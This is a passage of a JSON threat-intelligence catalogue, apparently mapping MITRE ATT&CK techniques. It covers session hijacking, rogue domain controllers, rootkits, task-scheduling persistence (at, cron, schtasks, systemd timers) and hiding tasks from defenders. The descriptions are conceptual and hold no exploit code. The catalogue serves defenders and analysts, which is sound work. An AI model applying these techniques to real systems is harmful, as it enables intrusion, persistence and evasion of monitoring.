All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.<sup>[[Kali Redsnarf](https://app.tidalcyber.com/references/459fcde2-7ac3-4640-a5bc-cd8750e54962)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1563.002"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "a0f4b31b-41b7-4602-914a-f46aa815aadb",
"value": "RDP Hijacking"
},
{
"description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.<sup>[[Slideshare Abusing SSH](https://app.tidalcyber.com/references/4f63720a-50b6-4eef-826c-71ce8d6e4bb8)]</sup><sup>[[SSHjack Blackhat](https://app.tidalcyber.com/references/64f94126-de4c-4204-8409-d26804f32cff)]</sup><sup>[[Clockwork SSH Agent Hijacking](https://app.tidalcyber.com/references/4a4026e3-977a-4f25-aeee-794947f384b2)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>\n\n[SSH Hijacking](https://app.tidalcyber.com/technique/45f2613d-35dd-4ddc-a222-30e9c0dd6bf6) differs from use of [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1563.001"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "45f2613d-35dd-4ddc-a222-30e9c0dd6bf6",
"value": "SSH Hijacking"
},
{
"description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "a0f4b31b-41b7-4602-914a-f46aa815aadb",
"type": "similar"
},
{
"dest-uuid": "45f2613d-35dd-4ddc-a222-30e9c0dd6bf6",
"type": "similar"
}
],
"uuid": "c992f340-645d-412a-b509-3cbaf94919b0",
"value": "Remote Service Session Hijacking"
},
{
"description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or <code>net view</code> using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "00a9a4d4-928d-4d95-be31-dfac6103991f",
"value": "Remote System Discovery"
},
{
"description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.<sup>[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)]</sup> This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.<sup>[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)]</sup><sup>[[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)]</sup> For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416",
"value": "Replication Through Removable Media"
},
{
"description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup> Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup> Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]</sup>\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure its not competing for resources.<sup>[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]</sup>\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.<sup>[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)]</sup> Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.<sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "d10c4a15-aeaa-4630-a7a3-3373c89a584f",
"value": "Resource Hijacking"
},
{
"description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "c5eb5b88-6c62-4900-9b14-c4d67d420002",
"value": "Rogue Domain Controller"
},
{
"description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. <sup>[[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)]</sup> \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). <sup>[[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)]</sup> Rootkits have been seen for Windows, Linux, and Mac OS X systems. <sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup> <sup>[[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "cf2b56f6-3ebd-48ec-b9d9-835397acef89",
"value": "Rootkit"
},
{
"description": "Adversaries may abuse the [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82)'s [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) in Windows environments, using [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.\n\nOn Linux and macOS, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860). If the <code>at.deny</code> exists and is empty, global use of [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860).<sup>[[Linux at](https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]</sup>\n\nAdversaries may use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) can also be abused to conduct remote [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) as part of [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or to run a process under the context of a specified account (such as SYSTEM).\n\nIn Linux environments, adversaries may also abuse [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may also be used for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) if the binary is allowed to run as superuser via <code>sudo</code>.<sup>[[GTFObins at](https://app.tidalcyber.com/references/3fad6618-5a85-4f7a-be2b-0600269d7768)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1053.002"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7",
"value": "At"
},
{
"description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.<sup>[[Kubernetes Jobs](https://app.tidalcyber.com/references/21a4388d-dbf8-487b-a2a2-67927b099e4a)]</sup><sup>[[Kubernetes CronJob](https://app.tidalcyber.com/references/354d242c-227e-4827-b559-dc1650d37acd)]</sup> An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.<sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1053.007"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9",
"value": "Container Orchestration Job"
},
{
"description": "Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup> The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.\n\nAn adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1053.003"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "803d286d-8104-4af8-9821-3f49240edc2b",
"value": "Cron"
},
{
"description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility could also be abused by adversaries (ex: [At](https://app.tidalcyber.com/technique/6051e618-c476-41db-8b0b-0aef9d2bbbf7)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://app.tidalcyber.com/technique/f37f0cd5-0446-415f-9309-94e25aa1165d)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).<sup>[[SigmaHQ](https://app.tidalcyber.com/references/27812e3f-9177-42ad-8681-91c65aba4743)]</sup><sup>[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]</sup> Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.<sup>[[Defending Against Scheduled Task Attacks in Windows Environments](https://app.tidalcyber.com/references/111d21df-5531-4927-a173-fac9cd7672b3)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1053.005"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82",
"value": "Scheduled Task"
},
{
"description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://app.tidalcyber.com/technique/803d286d-8104-4af8-9821-3f49240edc2b) in Linux environments.<sup>[[archlinux Systemd Timers Aug 2020](https://app.tidalcyber.com/references/670f02f1-3927-4f38-aa2b-9ca0d8cf5b8e)]</sup> Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).<sup>[[Systemd Remote Control](https://app.tidalcyber.com/references/0461b58e-400e-4e3e-b7c4-eed7a9b0fdd6)]</sup>\n\nEach <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://app.tidalcyber.com/technique/7aae1ad0-fb1f-484a-a176-c94e4c7ada77) unit files that are managed by the systemd system and service manager.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.<sup>[[Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018](https://app.tidalcyber.com/references/0654dabf-e885-45bf-8a8e-2b512ff4bf46)]</sup><sup>[[gist Arch package compromise 10JUL2018](https://app.tidalcyber.com/references/b2900049-444a-4fe5-af1f-b9cd2cd9491c)]</sup><sup>[[acroread package compromised Arch Linux Mail 8JUL2018](https://app.tidalcyber.com/references/99245022-2130-404d-bf7a-095d84a515cd)]</sup> Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.<sup>[[Falcon Sandbox smp: 28553b3a9d](https://app.tidalcyber.com/references/f27ab4cb-1666-501a-aa96-537d2b2d1f08)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1053.006"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea",
"value": "Systemd Timers"
},
{
"description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.<sup>[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]</sup>\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7",
"type": "similar"
},
{
"dest-uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9",
"type": "similar"
},
{
"dest-uuid": "803d286d-8104-4af8-9821-3f49240edc2b",
"type": "similar"
},
{
"dest-uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82",
"type": "similar"
},
{
"dest-uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea",
"type": "similar"
}
],
"uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8",
"value": "Scheduled Task/Job"
},
{
"description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "ea0557cd-94bc-48cf-9c3b-293c40986464",
"value": "Scheduled Transfer"
},
{
"description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.<sup>[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)]</sup><sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "4462ce9d-0a5a-427d-8160-7b307b50cfbd",
"value": "Screen Capture"
},
{
"description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victims infrastructure.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1597.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "56ab198f-f8bb-4fe9-bd85-5975d4d3863b",
"value": "Purchase Technical Data"
},
{
"description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup>\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1597.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "a150a804-1a17-45aa-a49f-d65ee901ab59",
"value": "Threat Intel Vendors"
},
{
